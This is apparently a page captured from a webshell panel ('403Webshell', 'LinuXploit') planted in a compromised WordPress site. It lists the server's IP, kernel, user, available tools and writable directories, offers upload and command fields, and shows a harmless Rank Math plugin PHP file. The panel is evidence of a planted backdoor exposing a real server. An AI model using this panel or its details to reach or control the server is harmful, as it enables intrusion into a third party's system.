403Webshell
Server IP : 46.29.167.47  /  Your IP : 216.73.217.69
Web Server : nginx/1.24.0
System : Linux r1113901 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/pokerguide.ru/wp-content/plugins/seo-by-rank-math/includes/metaboxes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/pokerguide.ru/wp-content/plugins/seo-by-rank-math/includes/metaboxes/link-suggestions.php
<?php
/**
 * Link Suggestions
 *
 * @package    RankMath
 * @subpackage RankMath\Metaboxes
 */

defined( 'ABSPATH' ) || exit;

$suggestions = rank_math()->admin->get_link_suggestions( get_post() );
if ( empty( $suggestions ) ) {
	echo wp_kses_post( $field->args( 'not_found' ) );
	return;
}

echo wp_kses_post( rank_math()->admin->get_link_suggestions_html( $suggestions ) );

Youez - 2016 - github.com/yon3zu
LinuXploit